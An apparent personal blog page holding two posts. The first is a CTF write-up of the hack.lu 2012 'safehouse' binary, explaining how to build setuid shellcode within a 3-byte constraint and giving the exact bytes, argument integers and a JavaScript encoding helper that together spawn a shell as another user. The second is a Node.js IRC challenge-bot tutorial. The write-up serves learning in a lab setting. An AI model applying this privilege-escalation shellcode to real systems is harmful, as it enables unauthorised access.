Wednesday, November 27, 2013
Saturday, November 2, 2013
Hacklu 2012: safehouse (binary 150) writeup
Yes, I know we are in 2013, but I still want to do a quick writeup of the binary safehouse from hacklu 2012, as I found it to be one of the best challenges I have ever done, really didactic!
So first of all, we have to ssh in through a web page; here is what we got:
(Image: beginning screen, from https://f00l.de/blog/)
OK, a nice setuid executable and its flag. As you can see, our user is called ctf; the target one (the one we want to impersonate) is called safehouse.
So, let's start!
The file command gives us "setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x5446b9058fdd04404a8b84827d5873028204ee90, not stripped"
OK fine, so a 64-bit executable, setuid (as we already know), and not stripped: lucky us!
Running the program with no arguments does nothing: it exits 0.
Running the program with an argument displays the following string:
Mmm.. me lika string! Let's open it with IDA and look for the string!
A quick look at the binary lets us find the function in charge of displaying our string:
(Image: the function that displays the string "Zombie detected")
OK, as presumed, if this function is called it will display the string and then exit.
Looking a bit more at the binary, we find where this function is called and what the binary is doing:
(Image: series of actions in main)
OK, so basically our program checks the number of args (not displayed, but it's just "if argc == 0 exit"), then drops the privileges and sets our function as a handler for signals (in particular SIGSEGV). Then it allocates a page and declares it as WRX.
Then it writes on this page every string we give as input, as a double word converted with the strtoul function, appending 0xc3 as the 4th byte, and then calls it! After calling all our "inputs", if no signal was received in the meantime it pops up a shell.
We begin to have an idea about what we have to do: we basically have to inject shellcode so that the program acquires the privileges of safehouse (without segfaulting), then the program itself is going to pop up a shell for us! The only limitation is given by that 0xC3 injected as the fourth byte of every double word, so we need a clever way to write our shellcode.
We know that setuid is a system call, therefore we can call it by means of an int 0x80 instruction.
Looking here we have a nice table of all system calls, with their parameters.
Gotcha! An int 0x80 with 0x17 in eax will call sys_setuid, which is what we need! uid_t should be in the ebx register, and we know safehouse is uid=1006 (0x3ee in hex).
Now we need to divide our input into several pieces, all of them smaller than 4 bytes:
mov al, 0x17 -> b0 17
mov bh, 0x3 -> b7 03 // high byte of 1006 (0x3ee)
mov bl, 0xee -> b3 ee // low byte of 1006 (0x3ee)
int 0x80 -> cd 80
Wow! We just need to split the setting of the bx register into two parts, and all our input is nicely divided into 2-byte-long blocks!
Obviously we still need to fill up 1 byte without letting the process crash, and what's better than a nice old 0x90 (nop)!?
So we have just built 4 arguments (remember LITTLE ENDIAN!):
'0x9017b0', '0x9003b7', '0x90eeb3', '0x9080cd'
Now it's just a matter of converting them to integers and we should be cool!
[9443248, 9438135, 9498291, 9470157]
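As an added example (not code from the writeup), the packing step above in JavaScript: it pads each instruction chunk to 3 bytes with nops, converts it to the little-endian integer that strtoul must parse, and reproduces the loader's 4-byte cell with the 0xc3 ret byte, so the constraint can be checked before anything is run. Buffer is Node's built-in.

```javascript
// Added example, not code from the writeup: models how the safehouse loader
// stores each argv value (strtoul -> little-endian dword, 4th byte forced to
// 0xc3) and checks that each 3-byte chunk survives that layout.

// Instruction bytes from the writeup, in execution order (x86 encodings).
const CHUNKS = [
  [0xb0, 0x17], // mov al, 0x17  (sys_setuid number)
  [0xb7, 0x03], // mov bh, 0x03  (high byte of uid 1006 = 0x3ee)
  [0xb3, 0xee], // mov bl, 0xee  (low byte of 0x3ee)
  [0xcd, 0x80], // int 0x80
];
const NOP = 0x90;
const RET = 0xc3;

// Pad each chunk to 3 bytes with nops and return the decimal argv values,
// i.e. what strtoul must parse so that byte 3 of the dword stays free.
function encodeArgs(chunks) {
  return chunks.map((c) => {
    if (c.length > 3) throw new RangeError('chunk would overlap the 0xc3 byte');
    const pad = Array(3 - c.length).fill(NOP);
    return Buffer.from([...c, ...pad, 0x00]).readUInt32LE(0);
  });
}

// Reproduce the loader's view of each value: dword written little-endian,
// then byte 3 overwritten with 0xc3 (ret). Returns one hex dump per arg.
function memoryLayout(values) {
  return values.map((v) => {
    if (v >= 2 ** 24) throw new RangeError('value would clobber the ret byte');
    const b = Buffer.alloc(4);
    b.writeUInt32LE(v, 0);
    b[3] = RET;
    return [...b].map((x) => x.toString(16).padStart(2, '0')).join(' ');
  });
}

const args = encodeArgs(CHUNKS);
console.log(args);               // the four integers handed over as argv
console.log(memoryLayout(args)); // what lands in each cell of the WRX page
```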
Trying to call the program with these arguments gives us
And a nice little shell for us!
That's it; I found this easy exploitation very didactic for building up a custom shellcode, a very nice piece of work!
There was also another version of this challenge, a bit more complex; it will be for next time!
This is a link (from the LeetMore writeup) for downloading the binary.
Enjoy!
Friday, November 1, 2013
IRC BOT: node.js, why not!?
Some time ago I created an IRC channel, and what do you obviously want to do if you are the admin of an IRC channel?! Create an awesome bot!
So let's create an IRC bot!
The first thing was to decide on the programming language:
I saw a lot of examples, from Ruby, Python, C, even Haskell! But all of them were a bit too complex, with tons of lines of code (except C, which was actually my first idea) that were useless for me.
So, what did I want?
I wanted something fast to write (I allocated no more than 2 hours for writing the whole code) and easy to configure, with the following actions:
- respond when consulted;
- give a challenge, wait for some time and activate a callback when the timeout expires.
Wait a minute: something silent, event-driven, scalable, non-blocking (it should give different challenges to different channels at the same time).. that's the definition written on the home page of node.js!
Lucky me, somebody already implemented a module that does IRC in a really easy way; the code is basically a huge switch that performs different activities based on the message received by the client, with a few additions (a parser, flood avoidance). Sounds good to me!
So, what is needed in order to configure it?
This:
Where config.json is
Not bad, huh?!
Then we just have to add some listeners, according to what we want the bot to listen to!
I wanted the bot to listen to the messages said on the channel, and if it sees a keyword ("@challenge"), activate a challenge!
The interface is the following:
Really easy: we just have to look at the message (which is a string, so we can/should split it into words), parse it and check whether it contains our beloved string.
When the bot wants to say something, all it has to do is just
Just that!
NOTE: currently I'm having an issue when a player leaves a channel: the bot crashes with a ValueError. Quick and dirty solution: put the for body at line 503 in a try/catch statement and it won't happen again.
I just had to implement the logic for supporting challenges, with timeouts etc., and that's it!
The implemented logic is really easy: the bot listens for a message starting with "@challenge", then looks at the next word and checks whether there is a challenge with that name. If present, it loads the challenge, writes it to the channel and sets a timeout.
If the bot receives a message starting with "@sol", it checks whether there is an active challenge with that name for that channel, compares the proposed solution with the actual one, and if the outcome is positive, it deletes the timer and gives the prize.
I wanted an easy way to add new challenges, where I didn't have to touch the code, therefore I created a separate file (which has to be loaded with require), which gives the bot the following object:
In this way we can create a challenge quickly and easily; all you need is an idea for a challenge.
The only issue is that right now a challenge is intended as a single question-answer, without intermediate steps, but supporting that is just a matter of a slight modification to bot.js, allowing an array of functions as chall and solver, so that we can track the current step.
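The @challenge / @sol logic described above, written as an added example (this is not the post's bot.js): the IRC client is replaced by an injected say() callback and timer functions, the challenge table is constructed here in place of the require()'d file, and "chall"/"solver" are the field names the post uses. Active challenges are tracked per channel, the timer is cancelled on a correct answer, and the lookup uses hasOwnProperty so that a channel user typing a name like "__proto__" cannot match an inherited property.

```javascript
// Added example (not the post's bot.js): @challenge / @sol dispatch with the IRC
// client replaced by an injected say() callback and timer functions. The table
// below is constructed; "chall" and "solver" are the field names the post uses.
const challenges = {
  rev1: { chall: 'What is 0x3ee in decimal?', solver: (a) => a === '1006' },
  asm1: { chall: 'Encoding of int 0x80 as hex bytes?', solver: (a) => a.toLowerCase() === 'cd80' },
};
function createBot(say, timeoutMs, setTimer = setTimeout, clearTimer = clearTimeout) {
  const active = new Map(); // channel -> { name, timer }: one challenge per channel
  function handle(channel, nick, text) { // returns a status string for tests
    // Channel text is untrusted: only ever split it and compare words.
    const words = String(text).trim().split(/\s+/);
    const [cmd, name] = words;
    if (cmd === '@challenge') {
      // hasOwnProperty keeps names like "__proto__" from matching the table
      if (!Object.prototype.hasOwnProperty.call(challenges, name)) {
        say(channel, `${nick}: unknown challenge`);
        return 'unknown';
      }
      if (active.has(channel)) {
        say(channel, `${nick}: a challenge is already running here`);
        return 'busy';
      }
      const timer = setTimer(() => {
        active.delete(channel);
        say(channel, `Time is up for ${name}!`);
      }, timeoutMs);
      active.set(channel, { name, timer });
      say(channel, `[${name}] ${challenges[name].chall}`);
      return 'started';
    }
    if (cmd === '@sol') {
      const cur = active.get(channel);
      if (!cur || cur.name !== name) {
        say(channel, `${nick}: no active challenge named ${name}`);
        return 'inactive';
      }
      if (!challenges[cur.name].solver(words.slice(2).join(' '))) {
        say(channel, `${nick}: wrong`);
        return 'wrong';
      }
      clearTimer(cur.timer); // solved in time: cancel the expiry callback
      active.delete(channel);
      say(channel, `${nick} wins ${cur.name}!`);
      return 'solved';
    }
    return 'ignored';
  }
  return { handle, isActive: (ch) => active.has(ch) };
}
```

Wiring it to the real client is one listener: on each channel message call handle(channel, nick, text) and pass the client's say method as say.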
Link to the github repo.
Have fun!